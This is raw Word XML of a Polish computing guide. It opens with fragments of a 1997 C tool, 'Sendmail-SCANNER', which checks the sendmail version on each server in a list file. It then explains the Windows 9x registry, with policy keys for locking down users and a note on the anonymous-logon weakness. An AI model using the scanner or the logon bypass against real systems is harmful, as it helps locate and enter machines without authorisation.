main(int argc,char *argv[])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ILE* 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char srv[1024];</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nt ile=0,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Sendmail-SCANNER 1.0b -- (c) lcamtuf '97\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argc!=2)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  Ten program sprawdza wersje sendmaila na serwerach </w:t>
        <w:tab/>
        <w:t>podanych");</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  w pliku.\n  Liste serwerow mozna utworzyc za pomoca </w:t>
        <w:tab/>
        <w:t>programu");</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  HTML2SRV.\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  Sposob uzycia: SMSCAN plik_z_lista_serwerow\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fopen(argv[1],"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f==NULL)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printf("Nie moge otworzyc podanego pliku.\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exit(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hile (fgets(srv,1024,f))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or (a=0;a&lt;=strlen(srv);a++)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srv[a]=='\n')||(srv[a]=='\r')) srv[a]=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f (strlen(srv)!=0)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sm(sr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il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  fclose(f);</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b/>
        <w:t xml:space="preserve">  printf("\nKoniec pracy. Sprawdzilem %d serwerow.\n",il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b/>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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>[ WINDOWS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t;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Rejestry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&l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lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Rejestr Windowsa jest bardzo pożyteczną bazą danych konfiguracji systemu i innych programów </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>stworzonych pod ten system operacyjny. Wszystkie ustawienia, takie jak: ustawienia pulpitu, użytkowników, myszki, a nawet konfiguracja sprzętowa zapisana jest w pliku rejestru. W ten sposób w Windowsie zniknęły pliki INI, w których to w starszych wersjach Windows i Dos były zapisane te ustawienia. Wszelkie zmiany w rejestrach będziemy wprowadzać za pomocą programu REGEDIT.EXE. Struktura rejestrów jest drzewiasta. Wszystkie ustawienia rejestrów są zapisane w plikach USER.DAT i SYSTEM.DAT. Uszkodzenie tych plików powoduje unieruchomienie całego systemu operacyjnego. Dlatego Windows sam robi kopie bezpieczeństwa tych plików i zapisuje je jako SYSTEM.DA0 i USER.DA0. Przed zmianami rejestrów powinieneś również zrobić kopię bezpieczeństwa.</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o uruchomieniu programu REGEDIT mamy po lewej stronie 6 głównych grup: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HKEY_LOCAL_MACHINE (HKLM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - komputer. W tej grupie zapisana jest </w:t>
        <w:tab/>
        <w:t xml:space="preserve">konfiguracja sprzętowa oraz konfiguracja zainstalowanych </w:t>
        <w:tab/>
        <w:t xml:space="preserve">aplikacji i samego systemu operacyjnego. Wszystkie te ustawienia </w:t>
        <w:tab/>
        <w:t xml:space="preserve">zapisane są w pliku SYSTEM.DAT.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HKEY_USER (HKU)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - użytkownicy. Tutaj zapisane są profile </w:t>
        <w:tab/>
        <w:t xml:space="preserve">konfiguracji użytkowników oraz ustawienia niektórych aplikacji, </w:t>
        <w:tab/>
        <w:t xml:space="preserve">indywidualne opcje drukowania i ustawienia sieci. Dane zapisane </w:t>
        <w:tab/>
        <w:t xml:space="preserve">są w pliku USER.DAT.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HKEY_CLASSES_ROOT (HKCR)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - jest wskaźnikiem do HKEY_LOCAL_MACHINE</w:t>
        <w:tab/>
        <w:t>\Software\Classe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HKEY_CURRENT_CONFIG (HKCC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> jest kopią HKEY_LOCAL_MACHINE\Config</w:t>
        <w:tab/>
        <w:t xml:space="preserve">\numer wykrytej konfiguracj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HKEY_CURRENT_USER (HKCU)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - kopia HKEY_USER\nazwa zalogowanego </w:t>
        <w:tab/>
        <w:t xml:space="preserve">użytkownik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HKEY_DYN_DATA (HKDD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ta grupa zmienia się dynamicznie i jest </w:t>
        <w:tab/>
        <w:t>przechowywana w pamięci RA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Jeśli przy komputerze pracuje wielu użytkowników (często niedoświadczo-nych) warto jest zabezpieczyć komputer przed uszkodzeniem. Nieprawidłowe posługiwanie się niektórymi narzędziami może doprowadzić do katastrofy. Windows posiada możliwość ograniczenia uprawnień dla różnych użytkowników. Nie można jednak ukryć jakichś katalogów przed innymi użytkownikami. Do tego celu służą specjalne programy. Jednocześnie każde zabezpieczenie da się w bardzo prosty sposób obejść, ale trzeba wiedzieć jak. Poniżej przedstawiam kilka podstawowych kluczy, którymi da się zabezpieczyć niektóre sytuacje. Uaktywnienie wymienionych wartości wymaga dopisania ich do odpowiednich kluczy i nadanie wartości binarnej 1.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HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Network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 xml:space="preserve">HideSharePwds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- ukrywanie haseł udostępniania poprzez zastąpienie </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ich na ekranie gwiazdkam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DisablePwdCaching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie buforowania haseł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AlphanumPwds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wymaganie korzystania z hasła alfanumerycznego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 xml:space="preserve">MinPwdLen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- minimalna długość hasł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DialIn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak możliwości odbierania telefonu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 xml:space="preserve">NoPrintSharing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- brak możliwości udostępniania drukarek innym </w:t>
        <w:tab/>
        <w:t xml:space="preserve">użytkownikom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 xml:space="preserve">Kolejne klucze tyczą się już konkretnego użytkownika, czyli w kategorii </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> lub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>HKEY_USER\użytkowni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HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Syste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NoDispCPL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do właściwości ekran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 xml:space="preserve">NoDispBackgroundPage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- wyłączenie dostępu do zakładki właściwości </w:t>
        <w:tab/>
        <w:t>ekranu TŁ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DispScrSavPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki właściwości </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ekranu WYGASZACZ EKRANU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DispApperancePage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki właściwości </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ekranu WYGLĄD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DispSettingsPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki właściwości </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ekranu USTAWIENI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SecCPL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do arkusza właściwości HASŁ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PwdPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu no zakładki ZMIEŃ HASŁO arkusza </w:t>
        <w:tab/>
        <w:t xml:space="preserve">HASŁ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AdminPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki ZDALNE </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ADMINISTROWANIE arkusza HASŁ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ProfilePage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki PROFILE </w:t>
        <w:tab/>
        <w:t xml:space="preserve">UŻYTKOWNIKA arkusza HASŁ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DevMgrPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki MENADŻER URZĄDZEŃ </w:t>
        <w:tab/>
        <w:t>arkusza SYSTE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ConfigPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki PROFILE SPRZĘTU </w:t>
        <w:tab/>
        <w:t xml:space="preserve">arkusza SYSTEM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FileSysPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do arkusza włąściwości SYSTEM </w:t>
        <w:tab/>
        <w:t xml:space="preserve">PLIKÓW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VirtMemPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do arkusza włąściwości PAMIĘĆ </w:t>
        <w:tab/>
        <w:t xml:space="preserve">WIRTUALN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DisableRegistryTools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do Edytora Rejestru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HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network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NoNetSetup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do właściwości siec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NetSetupIDPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki właściwości </w:t>
        <w:tab/>
        <w:t xml:space="preserve">sieci IDENTYFIKACJ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NetSetupSecurityPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączenie dostępu do zakładki </w:t>
        <w:tab/>
        <w:t xml:space="preserve">właściwości sieci KONTROLA DOSTĘPU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FileSharingControl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak kontroli nad współużytkowaniem plików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PrintSharingControl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak kontroli nad współużytkowaniem </w:t>
        <w:tab/>
        <w:t xml:space="preserve">drukarek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EntireNetwork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak folderu CAŁA SIEĆ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 xml:space="preserve">NoWorkgroupContents </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">- brak składników grup roboczych w OTOCZENIU </w:t>
        <w:tab/>
        <w:t xml:space="preserve">SIECIOWYM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HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer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PrinterTabs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ukrycie zakładek OGÓLNE i SZCZEGÓŁY arkusza </w:t>
        <w:tab/>
        <w:t xml:space="preserve">właściwości drukarek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DeletePrinter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak możliwości usuwania drukarek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AddPrinter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak możliwości dodawania drukarek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StartMenuSubFolders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ukrywa podfoldery menu START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Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak polecenia RUN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SetFolders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak polecenia USTAWIENIA w menu START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SetTaskbar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak właściwości paska zadań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Find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak polecenia ZNAJDŹ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Drives</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak dostępu do dysków logicznych (tyle jedynek ile </w:t>
        <w:tab/>
        <w:t xml:space="preserve">kolejnych dysków ma być ukrytych)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NetHood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak dostępu do OTOCZENIA SIECIOWEGO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Desktop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak pulpitu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Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak możliwości zamknięcia Windows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SaveSettings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - wyłączone zachowywanie ustawień przy wyjściu z </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Windows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RestorictRun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Klucz) - lista dozwolonych aplikacj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HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp</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Disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak możliwości uruchamiania aplikacji DOS'u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RealMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - brak możliwości uruchamiania aplikacji DOS'u w </w:t>
        <w:tab/>
        <w:t xml:space="preserve">trybie pojedynczej aplikacj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Wszyscy znamy problem z anonimowym logowaniem. Przy wyborze użytkownka wciskamy klawisz ANULUJ, lub piszemy nie znanego użytkownika i co ??? Logujemy się.... Konfiguracje wszystkich użytkowników zapisane są w kategorii </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>HKEY_USERS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> w kluczach odpowiadających nazwom użytkowników. Jest tam również użytkownik o nazwie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Jego konfiguracja jest konfiguracją domyślną. Jednym ze sposobów ograniczenia powyższych sytuacji jest skasowanie tego użytkownka lub ograniczenie mu różnych uprawnień.</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Informacje o zarejestrowanym użytkowniku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HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion</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RegisteredOwner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - nazwa użytkownik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RegisteredOrganization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - nazwa organizacj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ProductId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - identyfikator produktu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Version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - nazwa wersj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VersionNumber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - numer wersj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n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HKEY_CURRENT_USER\Control Panel\desktop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MenuShowDelay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> - czas zwłoki wyświetlania podmenu menu START (Ciąg </w:t>
        <w:tab/>
